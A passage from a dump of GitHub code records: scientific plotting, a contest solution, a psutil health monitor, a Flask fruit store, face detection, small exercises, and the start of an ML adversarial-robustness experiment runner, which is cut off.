+ 2*s2o3\n x = np.array([1e-9, 2e-9, 5e-9, 10e-9])\n\n fig = plt.figure(figsize=cm2inch(8.5, 6), constrained_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(x, alk, linewidth=LNW, label=r'alkalinity flux')\n ax.plot(x, s_total, linewidth=LNW, label=r'sulfur flux')\n ax.set_ylim(0, 19)\n\n ax.set_ylabel('Flux, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_xlabel('$kz_{dispersion}$, m$^2$ s$^{-1}$', fontsize=FNTSZ)\n\n ax.legend(loc='upper left', title='Fluxes',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_caco3():\n\n ds = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n alkflux_df = ds['B_C_Alk _flux'].to_dataframe()\n biogrow_df = ds['B_BIO_GrowthPhy'].to_dataframe()\n omresp_df = ds['B_BIO_DcPOM_O2'].to_dataframe()\n alk_df = ds['B_C_Alk'].to_dataframe()\n\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n omresp_bottom = omresp_df.groupby('z').get_group(2.4749999046325684)\n omresp_bottom = omresp_bottom.reset_index('z', drop=True)\n biogrow_surfac = biogrow_df.groupby('z').get_group(0.625)\n biogrow_surfac = biogrow_surfac.reset_index('z', drop=True)\n alk_surface = alk_df.groupby('z').get_group(0.625)\n alk_surface = alk_surface.reset_index('z', drop=True)\n alk_surface_year = alk_surface[START:STOP].reset_index()\n\n year = (('2011-01-01', '2011-01-31'), ('2011-02-01', '2011-02-28'),\n ('2011-03-01', '2011-03-31'), ('2011-04-01', '2011-04-30'),\n ('2011-05-01', '2011-05-31'), ('2011-06-01', '2011-06-30'),\n ('2011-07-01', '2011-07-31'), ('2011-08-01', '2011-08-31'),\n ('2011-09-01', '2011-09-30'), ('2011-10-01', '2011-10-31'),\n ('2011-11-01', '2011-11-30'), ('2011-12-01', '2011-12-31'))\n\n year_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n alk_year_delta = []\n alk_year = []\n bio_year = []\n res_year = []\n for month in year:\n alk_delta_month = alk_surface[month[0]:month[1]]\n alk_month = alkflux_bottom[month[0]:month[1]]\n bio_month = biogrow_surfac[month[0]:month[1]]\n res_month = omresp_bottom[month[0]:month[1]]\n 
alk_year_delta.append(alk_delta_month['B_C_Alk'][0])\n alk_year.append(alk_month['B_C_Alk _flux'].mean())\n bio_year.append(bio_month['B_BIO_GrowthPhy'].mean())\n res_year.append(res_month['B_BIO_DcPOM_O2'].mean())\n\n bio_year_quotas = np.array(bio_year)/sum(bio_year)\n res_year_quotas = np.array(res_year)/sum(res_year)\n caco3_precipitation = bio_year_quotas*1000/year_days\n caco3_dissolution = res_year_quotas*1000/year_days\n ca_flux = caco3_dissolution - caco3_precipitation\n ca_array = np.array(ca_flux)/2.5*2\n\n alk_array = np.array(alk_surface_year['B_C_Alk'])\n alkflux_bottom_year = alkflux_bottom[START:STOP].reset_index()\n\n calpart = np.zeros(365)\n day = 0\n last_entry = 0\n for month, increment in zip(year_days, ca_array):\n temp = np.linspace(last_entry+increment,\n last_entry+increment*month, num=month)\n calpart[day:day+month] = temp\n last_entry = temp[-1]\n day += month\n\n result_array = alk_array + calpart\n\n caco3_dis = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_dissolution):\n caco3_dis[day:day+month] = increment\n day += month\n\n caco3_pre = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_precipitation):\n caco3_pre[day:day+month] = increment\n day += month\n\n fig = plt.figure(figsize=(12, 10))\n ax1 = fig.add_subplot(2, 1, 1)\n ax2 = fig.add_subplot(2, 1, 2)\n\n ax1.xaxis_date()\n ax2.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax1.plot(alk_surface_year['time'], caco3_dis*2,\n label='CaCO$_3$ dissolution')\n ax1.plot(alk_surface_year['time'], caco3_pre*2,\n label='CaCO$_3$ precipitation')\n ax1.plot(alk_surface_year['time'], alkflux_bottom_year['B_C_Alk _flux'],\n label='Modelled TA flux at the SWI')\n ax1.plot(alk_surface_year['time'],\n caco3_dis*2+alkflux_bottom_year['B_C_Alk _flux'], linewidth=2,\n label=r'CaCO$_3$ dissolution + TA flux at the SWI')\n ax1.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n ax2.plot(alk_surface_year['time'], calpart-calpart.min(), linewidth=2,\n label=r'Due to CaCO$_3$ dissolution/precipitation')\n ax2.plot(alk_surface_year['time'], alk_array-alk_array.min(), linewidth=2,\n label=r'From the model calculations')\n ax2.plot(alk_surface_year['time'], result_array-result_array.min(),\n linewidth=2, label=r'CaCO$_3$ + model calculations')\n ax2.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax2.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax1, ax2)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\nif __name__ == \"__main__\":\n plot_intro()\n # plot_alkalinity_flux_low_high()\n # plot_alkalinity_flux_sulfur_oxidation()\n # plot_alkalinity_flux_porosities1_2_3()\n # plot_alk_sulfur_fluxes()\n # plot_caco3()\n","repo_name":"limash/Alkalinity_in_the_Wadden_Sea","sub_path":"src/prepared_plots.py","file_name":"prepared_plots.py","file_ext":"py","file_size_in_byte":20721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30860822247","text":"from fractions import Fraction\n\ninfile = open(\"casino.in\", \"r\")\noutfile = open(\"casino.out\", \"w\")\n\nn, m, k, c, l = [int(x) for x in 
infile.readline().strip().split()]\nwheel = [[0 for i in range(26)] for j in range(n)]\nfor i in range(n):\n for v in infile.readline().strip():\n wheel[i][ord(v)-ord('A')] += 1\n\nans = 0\nfor i in range(c):\n s, pay = infile.readline().strip().split()\n pay = int(pay)\n cnt = 1\n for i in range(n):\n if s[i] == '*':\n cnt *= m\n else:\n cnt *= wheel[i][ord(s[i])-ord('A')]\n ans += Fraction(pay * cnt, m ** n)\n\nif ans > 1:\n ans -= 1\n outfile.write(\"{}/{}\\n\".format(ans.numerator, ans.denominator))\n outfile.write(\"{}\\n\".format(l))\n outfile.write(\"{}\\n\".format(\" \".join([str(x+1) for x in range(l)])))\nelse:\n outfile.write(\"0/1\\n\")\n outfile.write(\"0\\n\")\n\n\n","repo_name":"ehnryx/acm","sub_path":"asc19-cf100324/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"9629243972","text":"# written by Lekhraj(USD) pandeylekhraj4447@gmail.com\n#importing libraries main library is psutil midas.client communicates with odb page \n\nimport psutil\nimport numpy as np\nimport os\nimport pytz\nfrom datetime import datetime\nfrom pytz import timezone\nimport midas.client\nimport socket\nimport json\nimport os.path\n\n#connecting my script to odb\nclient = midas.client.MidasClient(\"pytest\")\n\n#for getting time \ntz_Pac = pytz.timezone('US/Pacific')\ndatetime = datetime.now(tz_Pac)\ndatetime= datetime.strftime('%a %b %d %H:%M:%S %Z %Y')\n#print(datetime)\n#get hostname\nhostoutput= socket.gethostname()\nhostoutput=hostoutput.split('.')[0]\n#path inside midas client is path in the odb where the threshold comparable values comes from odb page\nODBTest=client.odb_get(\"/HealthMonitoring/ComputerMonitoring/ThresholdControl/\"+hostoutput+\"/ODB_Test_Value\")\nODB_test_variable=int(ODBTest)\nDiskSpaceThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/NumDiskaboveTest_Value')\nMeanProcessorThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MeanCPUutilThreshold')\nMemThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MemUtilThreshold')\n\n\n\ndef disk_partition():\n\n ''' We are using library psutil and trying to get detail of disk partions. We are finding\n total number of partitions, maximum usgae and minimum usage. 
Also, we keep ODB_test_variable and try\n to get disk partion higher then ODB_test_variable\n\n '''\n \n num_of_partitions = 0\n higher_than_threshold = 0\n max_usage = 0\n min_usage =100\n #print('Threshold Percentage Value for Disk = {} % '.format(str(ODB_test_variable)))\n #templ = \"%-17s %8s %8s %8s %5s%% %9s %s\"\n #print(templ % (\"Device\", \"Total\", \"Used\", \"Free\", \"Use \", \"Type\",\n # \"Mount\"))\n templ=\"%-17s %5s%%\"\n filesystem=[]\n usedpercent=[]\n for part in psutil.disk_partitions(all=False):\n #print(os.name)\n if os.name == 'nt':\n if 'cdrom' in part.opts or part.fstype == '':\n # skip cd-rom drives with no disk in it; they may raise\n # ENOENT, pop-up a Windows GUI error for a non-ready\n # partition or just hang.\n continue\n usage = psutil.disk_usage(part.mountpoint)\n templ % (\n filesystem.append(part.device),\n usedpercent.append(usage.percent))\n\n # FreeListPer= list(map(lambda x: round(100 - x,2), usedpercent))\n # print(filesystem)\n # print(usedpercent)\n # print(FreeListPer)\n for values in usedpercent:\n #print(df3_df['filesystem'],values)\n values = float(values)\n #print(values)\n #converting string into float\n num_of_partitions += 1\n if values > max_usage:\n max_usage =values\n # print(max_usage)\n if values < min_usage:\n min_usage =values\n # print(min_usage)\n if values > ODB_test_variable:\n higher_than_threshold += 1\n if higher_than_threshold < 1:\n higher_than_threshold = 0\n return [num_of_partitions, max_usage, min_usage, higher_than_threshold]\n\n \ndef Processor_Utilization():\n\n ''' We are using library psutil and trying to get detail of num of CPU used and their respective\ncpu utilization percentage. We are keeping maximum,minumium cpu utilization and number of cpu in webpage\n '''\n\n num_CPUs = psutil.cpu_count()\n CPUsUtilization_percent = psutil.cpu_percent(interval=1,percpu=True)\n MeanValue=sum(CPUsUtilization_percent)/len(CPUsUtilization_percent)\n MeanValue=round(MeanValue,3)\n return[num_CPUs,CPUsUtilization_percent,MeanValue] \n\n\ndef MemoryUtilization():\n # print('\\n\\n********Memory Utilization*********\\n\\n')\n ''' We are using library psutil and trying to get detail of virtual and swap\n memory using psutil.virtual_memory() and psutil.swap_memory(). 
We are finding\n ntotal memory in GB by converting bytes into GB and we are finding Memory Utilization\n (total -avialable)*100/total in term of percentage in case both of RAM and Swap \n '''\n\n Memory= psutil.virtual_memory()\n SwapMemory= psutil.swap_memory()\n MemTot= round(Memory.total/(1024**3),2)\n SwapMemTot= round(SwapMemory.total/(1024**3),2)\n MemPercent= Memory.percent\n SwapMemPercent= SwapMemory.percent\n return [MemTot, SwapMemTot, MemPercent, SwapMemPercent]\n\n# values from processor utilization, disk Space Utilization & memoryutilization \n\nProcessor_=Processor_Utilization()\ndisk_=disk_partition()\nMemory_=MemoryUtilization()\n\njson1={'hostname':hostoutput,'DiskSpaceUtilization':{'LastRead':datetime,'nmDiskSpaceChk':disk_[0],'MaxDiskSpaceChk%':disk_[1],'MinDiskSpaceChk%':disk_[2],'nmGtrThreshold':disk_[3]},'ProcessorUtilization':{'LastRead':datetime,'nmCPUs':Processor_[0],'MaxCPUutilized%':max(Processor_[1]),'MinCPUutilized%':min(Processor_[1]),'MeanCPUutilized%':Processor_[2]},'MemoryUtilization':{'LastRead':datetime,'MemoryUsed%':Memory_[1],'MemTotinGB':Memory_[0],'SwapMemoryused%':Memory_[3],'SwapMemTotinGB':Memory_[2]},'Alarm':[hostoutput,ODB_test_variable,DiskSpaceThreshold,MeanProcessorThreshold,MemThreshold,disk_[3],Processor_[2],Memory_[1]]}\n#print(json1)\n#Pathwhere the code is running\n#PathJson= os.path.join(os.getcwd())\n#print(PathJson)\nPathJson=\"/home/cdms/health_monitoring/Computermonitoring/SystemHealthMonitor/FinalCompMonitoring\"\nout_file = open(str(PathJson)+\"/Json/\"+ str(hostoutput) +\".json\", \"w\")\njson.dump(json1, out_file)\n\nout_file.close()\n\n","repo_name":"pandeylekhraj/SystemHealthMonitor","sub_path":"FinalCompMonitoring/ReturnJsonFileCompMonitor.py","file_name":"ReturnJsonFileCompMonitor.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14062143390","text":"from flask import Flask, render_template, request, redirect\napp = Flask(__name__) \n\nimport time\n\n@app.route('/') \ndef index():\n return render_template(\"index.html\")\n\n@app.route('/checkout', methods=['POST']) \ndef checkout():\n strawberry = request.form[\"strawberry\"]\n raspberry = request.form[\"raspberry\"]\n blackberry = request.form[\"blackberry\"]\n apple = request.form[\"apple\"]\n fruits = {\"strawberry\":strawberry,\"raspberry\":raspberry,\"blackberry\":blackberry,\"apple\":apple}\n\n fname = request.form[\"first_name\"]\n lname = request.form[\"last_name\"]\n student_id = request.form[\"student_id\"]\n\n items = int(strawberry) + int(raspberry) + int(blackberry) + int(apple)\n\n localtime = time.asctime( time.localtime(time.time()) )\n\n return render_template(\"checkout.html\", fruits=fruits, fname=fname, lname=lname, student_id=student_id, items=items, localtime=localtime)\n\n@app.route('/fruits') \ndef fruits():\n fruits = [\"apple.png\", \"blackberry.png\", \"raspberry.png\", \"strawberry.png\"]\n return render_template(\"fruits.html\", fruits=fruits)\n\nif __name__==\"__main__\": \n app.run(debug=True) ","repo_name":"GustavoMonardez/python-flask-cd-fruit-store","sub_path":"fruit-store.py","file_name":"fruit-store.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15636549356","text":"#! 
/usr/bin/env python\nimport cv2\nimport sys\n\ndef find_face_image():\n\t# image to analyze/Cascade for opencv to perform analysis\n\timagePath = \"YourImagePath\"\n \n \t# You need to download this xml file. It's necessary for the program to run\n\tcascPath = \"/YourPath/haarcascade_frontalface_default.xml\"\n\n\t# Read the image and convert to grayscale\n\timage = cv2.imread(imagePath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Create the haar cascade. Used for algorithm to find faces\n\tface_cascade = cv2.CascadeClassifier(cascPath)\n\n\t# Detect faces in the image\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n\t roi_gray = gray[y:y+h, x:x+w]\n\t roi_color = image[y:y+h, x:x+w]\n\n\t# Print out how many faces were found in the image\n\tprint(\"Found {0} faces!\".format(len(faces)))\n\n\t# Show the image with the selected faces. If user enters ESC key then exit program\n\twhile True:\n\t\tcv2.imshow(\"Faces found\", image)\n\t\t\n\t\tif cv2.waitKey(1) & 0xFF == 27:\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()\n","repo_name":"spencerneveux/FacialRecognition","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9489547030","text":"import itertools\nN = input()\nN = int(N)\nAs = list(map(int,input().split(\" \")))\nans = 0\nl = 0\nr = 0\nbefore = 0\nwhile l< N:\n while N > r >= l and before self.your_power:\n print(\"我赢了!\")\n else:\n print(\"你赢了\")\n\n\n\n\n","repo_name":"chenrong1105/chenrong_zuoye","sub_path":"pythoncs/python_zuoye/zuoye2/zuoye2_TongLao.py","file_name":"zuoye2_TongLao.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38805992789","text":"# Need to create a Human class with attributes: name, surname, age, phone, address\n# Attributes must be filled in the __init__ method\n# You also need to write methods:\n#\n# get_info(self) - which returns a dictionary containing information about the person\n# call(self, phone_number) - which will output \"{self.phone} calling {phone_number}\"\n# You need to create 3 objects of the Human class and call the get_info method on them\n\n\nclass Human:\n\n def __init__(self, name: str, surname: str, age: int, phone: str, address: str):\n self.name = name\n self.surname = surname\n self.age = age\n self.phone = phone\n self.address = address\n\n def get_info(self):\n human_info = {\n 'name': self.name,\n 'surname': self.surname,\n 'age': self.age,\n 'phone': self.phone,\n 'address': self.address,\n }\n return human_info\n\n def call(self, phone_number):\n print(f'{self.phone} calling {phone_number}')\n\n\ninfo1 = Human('Bob', 'Dylan', 45, '+981234567890', 'Fulton St. 654')\ninfo2 = Human('Jim', 'Carrie', 59, '+380234342313', 'Lafayette Av. 12')\ninfo3 = Human('Mishel', 'Pfeiffer', 23, '+86783451242', 'St. Marks Pl. 
1')\nprint(info1.get_info())\nprint(info2.get_info())\nprint(info3.get_info())\n\n","repo_name":"spasmx/hillel_aqa_rep","sub_path":"class_human_hw13.py","file_name":"class_human_hw13.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23590032002","text":"\"\"\"\n经典全组合 直接调用库函数 其实为了点进去看看他的实现代码\n\"\"\"\nimport itertools\n\n\nclass Solution:\n def subsets(self, nums):\n results = []\n for i in range(len(nums) + 1):\n for r in itertools.combinations(nums, i):\n results.append(list(r))\n return results\n\n\ns = Solution()\nprint(s.subsets([1, 2, 3]))\n","repo_name":"algorithm002/algorithm","sub_path":"Week_04/id_3/backtracking/LeetCode_78_3_v2.py","file_name":"LeetCode_78_3_v2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"66"} +{"seq_id":"27933185025","text":"\n\nimport random\n\n\nboard = [[\" \" for _ in range(9)] for _ in range(9)]\npossible_board = [[[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"] for _ in range(9)] for _ in range(9)]\n\ndef print_board(board):\n for line in board:\n print(line)\n\n#print_board(board)\n\ndef is_legal(to_check: list):\n to_check = [val for val in to_check if val != ' ']\n return len(to_check) == len(set(to_check))\n\ndef is_board_legal(board):\n for i in range(9):\n # Lines\n if not is_legal(board[i]):\n return False\n # Cols\n elif not is_legal([board[j][i] for j in range(9)]):\n return False\n # Cells\n j = i % 3 * 3\n i //= 3\n cell = [\n board[i][j], board[i][j+1], board[i][j+2],\n board[i+1][j], board[i+1][j+1], board[i+1][j+2],\n board[i+2][j], board[i+2][j+1], board[i+2][j+2]\n ]\n if not is_legal(cell):\n return False\n return True\n\ndef cells_with_no_choice(board):\n for line in possible_board:\n for possible in possible_board:\n if len(possible) == 0:\n return True\n return False\n\n\ndef update_cell_possibilities(modified_cell):\n pass\n\n'''\nboard = [\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n \n]\n'''\n\nwhile True:\n best_len = 10\n best = []\n for l, line in enumerate(board):\n for c, cell in enumerate(line):\n if len(possible_board[l][c]) < best_len:\n best_len = len(possible_board[l][c])\n best = [[l, c]]\n elif len(possible_board[l][c]) == best_len:\n best.append([l, c])\n \n chosen = random.choice(best)\n board[chosen[0]][chosen[1]] = random.choice(possible_board[chosen[0]][chosen[1]])\n","repo_name":"Mactywd/puzzles","sub_path":"sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7554761777","text":"# n! means n × (n − 1) × ... × 3 × 2 × 1\n\n# For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\n# and the sum of the digits in the number 10! 
is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\n# Find the sum of the digits in the number 100!\n\nfrom math import factorial\n\nnumber = factorial(100)\ntotal = 0\n\nfor num in str(number):\n total += int(num)\n\nprint(total)\n","repo_name":"alexLaws/projectEuler","sub_path":"020problem.py","file_name":"020problem.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16965067718","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom config import DATA_DIR\n\n\"\"\"\nQuestions\n\"\"\"\n\n\ndef plot_questions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"SubmissionCount\"], y=df[\"Tags\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Tags\"))\n return fig\n\n\nquestions_df = pd.read_csv(DATA_DIR / \"codechef/questions.csv\", index_col=[0])\n\nquestions_df_with_count = questions_df.dropna(subset=[\"SubmissionCount\"]).copy()\nquestions_df_with_count[\"Tags\"] = questions_df_with_count[\"Tags\"].apply(lambda tags: eval(tags))\ntag_count_top_10 = questions_df_with_count \\\n .explode(\"Tags\") \\\n .groupby(\"Tags\")[\"SubmissionCount\"] \\\n .sum().sort_values(ascending=False)[:10]\nfig1 = plot_questions_tag_chart(pd.DataFrame(tag_count_top_10).reset_index())\n\n\"\"\"\nSolutions\n\"\"\"\n\n\ndef plot_submissions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"UserID\"], y=df[\"Language\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Languages\"))\n return fig\n\n\nsolutions_df = pd.read_csv(DATA_DIR / \"codechef/solutions.csv\", index_col=[1])\nlanguage_count = solutions_df \\\n .reset_index()[[\"UserID\", \"Language\"]] \\\n .drop_duplicates() \\\n .groupby(\"Language\")[\"UserID\"] \\\n .count() \\\n .sort_values(ascending=False)[:10]\nfig2 = plot_submissions_tag_chart(pd.DataFrame(language_count).reset_index())\n\n\ndef plot_language_invalid_state_chart(df):\n status = df[\"Status\"].unique()\n sum_df = df.groupby(\"Language\").agg({\"SolutionID\": \"sum\"})\n sorted_index = sum_df.sort_values(\"SolutionID\", ascending=False).index\n percentage_df = df.groupby([\"Language\", \"Status\"]).agg({\"SolutionID\": \"sum\"}). \\\n div(sum_df, level=\"Language\"). \\\n reset_index(). \\\n set_index(\"Language\").loc[sorted_index]. 
\\\n reset_index()\n fig = go.Figure([\n go.Bar(\n name=state,\n x=percentage_df[percentage_df[\"Status\"] == state][\"Language\"],\n y=percentage_df[percentage_df[\"Status\"] == state][\"SolutionID\"],\n )\n for state in status])\n fig.update_layout(dict(barmode=\"stack\"))\n fig.update_layout(xaxis=dict(title=\"Types of Unsuccessful Submissions by Languages\"))\n return fig\n\n\nvalid_state = [\"accepted\", \"wrong answer\", \"internal error\", \"running..\", \"compiling..\", \"running judge..\"]\nsolutions_df_valid_state = solutions_df.dropna(subset=[\"Status\"]).reset_index()\ninvalid_state_count = solutions_df_valid_state[~solutions_df_valid_state[\"Status\"].isin(valid_state)] \\\n .groupby([\"Status\", \"Language\"])[\"SolutionID\"] \\\n .count() \\\n .reset_index()\ntop_languages_with_invalid_sum = pd.DataFrame(invalid_state_count\n .groupby(\"Language\")[\"SolutionID\"]\n .sum()\n .sort_values(ascending=False)[:10]).reset_index()\nstate_df = invalid_state_count[invalid_state_count[\"Language\"].isin(top_languages_with_invalid_sum[\"Language\"])]\nfig3 = plot_language_invalid_state_chart(state_df)\n\n\ndef plot_pie_chart(df, level_range):\n charts = []\n for level in level_range:\n fig = go.Figure(\n data=[go.Pie(\n labels=df.loc[level, \"SolutionStatus\"],\n values=df.loc[level, \"SolutionID\"],\n hole=.3,\n textinfo=\"label+percent\",\n marker=dict(colors=[\"red\", \"royalblue\"]))\n ],\n layout=dict(annotations=[\n {\n \"font\": {\n \"size\": 16,\n \"color\": '#5A5A5A'\n },\n \"showarrow\": False,\n \"text\": level,\n \"x\": 0.5,\n \"y\": 0.5\n }\n ])\n )\n fig.update(dict(layout_showlegend=False))\n charts.append(fig)\n return charts\n\n\nlevels = [\"beginner\", \"easy\", \"medium\", \"hard\", \"challenge\"]\nsolutions_df_levels = solutions_df.join(questions_df[\"level\"], on=\"QCode\")\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] == \"accepted\", \"SolutionStatus\"] = \"Passed\"\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] != \"accepted\", \"SolutionStatus\"] = \"Failed\"\nsolutions_df_levels = solutions_df_levels.groupby([\"level\", \"SolutionStatus\"])[\"SolutionID\"].count().reset_index()\nfigures = plot_pie_chart(solutions_df_levels.set_index(\"level\"), levels)\n\ncodechef_visualization = dbc.Container([\n html.H1(\"Codechef Competitive Programming Analytics\"),\n html.Hr(),\n dbc.Col([\n html.H3(\"Overview of Passing/Failing Submissions by Levels\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[:3])),\n justify=\"center\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[3:])),\n justify=\"center\"),\n html.H3(\"Detailed Submission Breakdown\"),\n dbc.Row([\n dcc.Graph(id=\"status-chart\", figure=fig3, style=dict(width=\"100%\")),\n ]),\n dbc.Row([\n dcc.Graph(id=\"tag-chart\", figure=fig1),\n dcc.Graph(id=\"language-chart\", figure=fig2)\n ], justify=\"center\")\n ], align=\"start\"),\n],\n fluid=True\n)\n","repo_name":"terryluzj/cs-information-visualization-assignments-python","sub_path":"routes/codechef/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39672950199","text":"import os, sys, datetime, time\nfrom comet_ml import Experiment\n\nimport argparse\n\nfrom learning.dataloader import get_loader, get_info\nfrom experiments.attacks import load_model, init_comet, abbrev_to_task, TASKONOMY_DATASET\nfrom 
models.mtask_losses import get_losses_and_tasks\nfrom utils.art.attacks.pytorch_mtask import mtask_forone_advacc\n\n\nparser = argparse.ArgumentParser(description='Run Adversarial attacks experiments')\nparser.add_argument('--arch', type=str, default=\"resnet18\")\nparser.add_argument('--dataset', type=str, default=\"taskonomy\")\nparser.add_argument('--model_root', type=str, default=None)\nparser.add_argument('--data_dir', type=str, default=TASKONOMY_DATASET)\nparser.add_argument('--train_task_set', default=\"ds\")\nparser.add_argument('--aux_task_set', default=\"\")\nparser.add_argument('--test_task_set', default=\"\")\nparser.add_argument('--target_task_set', default=\"\")\nparser.add_argument('--step_size', type=int, default=2)\nparser.add_argument('--epoch', type=str, default=\"150\")\nparser.add_argument('--test_batch_size',type=int, default=32)\nparser.add_argument('--classes',type=int, default=18)\nparser.add_argument('--epsilon',type=int, default=16)\nparser.add_argument('--workers',type=int, default=8)\nparser.add_argument('--pixel_scale',type=int, default=255)\nparser.add_argument('--steps', type=int, default=25)\nparser.add_argument('--debug', action='store_true')\nparser.add_argument('--timestamp', type=str, default=None)\nparser.add_argument('--strategy', type=str, default=\"None\")\nparser.add_argument('--name', type=str, default=\"robust-mtl-RQ2_2\")\nparser.add_argument('--norm', type=str, default=\"Linf\")\nparser.add_argument('--metrics', type=str, default=\"vuln\")\nparser.add_argument('--store_examples', type=int, default=0)\nargs = parser.parse_args()\n\ndefault_model_root = os.path.join(\".\",\"output\",args.dataset,\n \"train_{arch}_{dataset}_2021-01-20_19-18-12_9b01b470_trainset_{train}{aux}_testset_{test}_lambda_0.01_seed_42_lrs_120_140\")\nargs.model_root = default_model_root if args.model_root is None else args.model_root\nargs.timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n\ndef run(args):\n\n args_dict = args.__dict__\n for a in args_dict.keys():\n val = args_dict.get(a)\n if isinstance(val,str):\n setattr(args,a,val.replace(\"\\r\", \"\"))\n\n experiment = init_comet(args,project_name=args.name) if args.name != \"#\" else None\n\n args.train_task_set, args.target_task_set, args.test_task_set, args.aux_task_set = \\\n abbrev_to_task(args.train_task_set), abbrev_to_task(args.target_task_set), abbrev_to_task(args.test_task_set), \\\n abbrev_to_task(args.aux_task_set)\n\n\n model = load_model(args)\n args.task_set = args.test_task_set\n target_task = args.target_task_set\n\n val_loader = get_loader(args, \"val\", out_name=True)\n criteria, tasks = get_losses_and_tasks(args)\n info = get_info(args.dataset)\n\n\n dict_losses2 = mtask_forone_advacc(val_loader, model, criteria, target_task, args, info, test_vis=True,\n norm=args.norm,comet=experiment)\n\n\n\nif __name__ == '__main__':\n\n if len(args.train_task_set) == 0:\n exit()\n\n if len(args.test_task_set) == 0:\n args.test_task_set = args.train_task_set\n\n if len(args.target_task_set) == 0:\n args.target_task_set = args.train_task_set\n\n if args.test_task_set.find(\"+\") >-1:\n 